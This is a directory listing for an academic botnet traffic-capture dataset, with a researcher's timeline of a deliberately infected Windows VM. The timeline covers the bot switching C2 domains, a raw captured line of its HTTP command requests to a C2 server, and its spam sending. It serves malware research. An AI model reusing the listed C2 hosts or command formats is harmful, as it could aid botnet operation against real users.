Index of /publicDatasets/CTU-Malware-Capture-Botnet-110-4

[ICO]NameLast modifiedSizeDescription

[PARENTDIR]Parent Directory  -  
[DIR]bro/2017-04-25 09:42 -  
[DIR]webpages-requested-by-spam/2015-04-22 11:54 -  
[   ]2015-04-22_capture-win9.capinfos2017-04-25 09:42 1.1K 
[   ]2015-04-22_capture-win9.tcpdstat2017-04-25 09:42 1.8K 
[TXT]README.md2015-04-22 11:49 1.9K 
[TXT]README.html2017-04-25 09:43 2.2K 
[   ]2015-04-22_capture-win9.dnstop2017-04-25 09:39 22K 
[IMG]htbot-1.png2015-04-21 09:06 22K 
[   ]e515267ba19417974a63b51e4f7dd9e9.exe.zip2015-12-16 10:26 39K 
[   ]2015-04-22_capture-win9.passivedns2017-04-25 09:39 339K 
[TXT]fast-flux-dga-first-analysis.txt2017-04-25 09:43 415K 
[   ]2015-04-22_capture-win9.weblogng2016-06-15 17:43 4.9M 
[   ]2015-04-22_capture-win9.rrd2015-04-22 09:29 8.0M 
[   ]2015-04-22_capture-win9.binetflow2017-04-25 09:42 19M 
[   ]2015-04-22_capture-win9.biargus2017-04-25 09:42 96M 
[TXT]2015-04-22_capture-win9.html2015-04-22 12:15 762M 
[   ]2015-04-22_capture-win9.pcap2017-04-25 09:39 762M 
[   ]2015-04-22_capture-win9.json2015-04-22 12:15 1.3G 

Timeline

Thu Apr 9 10:38:37 CEST 2015

The computer froze yesterday around 22hs.

Thu Apr 9 13:52:22 CEST 2015

started win9 already infected with e515267ba19417974a63b51e4f7dd9e9.

Mon Apr 20 11:08:47 CEST 2015

Some days ago, the domain papausafr.com stop answering. A little bit after Mon, 13 Apr 2015 14:04:11 GMT, in the real time. (04:07:42.825257 in the pcap time) So I will reboot it to see if it gets a new domain.

Mon Apr 20 11:13:01 CEST 2015

Rebooted win9. Same pcap file

It seems that is worked! It is asking for a new domain solocoufandle.com, and send some GET

22:22:15.343895 tcp 10.0.2.109 49158    -> 37.187.245.14 80 SRPA_SPA 528 431935  s[120]=GET /viber.php HTTP/1.1..User-Agent: pb..Host: solocoufandle.com..Cache-Control: no-cache....GET /md.php?command=getip H d[120]=HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Mon, 20 Apr 2015 09:37:45 GMT..Content-Type: text/html..Transfer-Encoding:  s[300]=GET /viber.php HTTP/1.1..User-Agent: pb..Host: solocoufandle.com..Cache-Control: no-cache....GET /md.php?command=getip HTTP/1.1..User-Agent: pb..Host: solocoufandle.com..Cache-Control: no-cache....GET /md.php?command=ghl&id=1494363983 HTTP/1.1..User-Agent: pb..Host: solocoufandle.com..Cache-Control: d[300]=HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Mon, 20 Apr 2015 09:37:45 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.4.37....1f..http://solocoufandle.com/md.php..0....HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Mon, 20 Apr 2015 09:37:45 GMT..C

It start verifing email addresses

It start sending SPAM.

We downloaded some of the web pages linked in the spam. The link in the spam are different, but the link they link is mostly the same all the time: http://sansarall.ru/. And we started another capture (win8) accessing it.

Wed Apr 22 09:26:13 CEST 2015

poweroff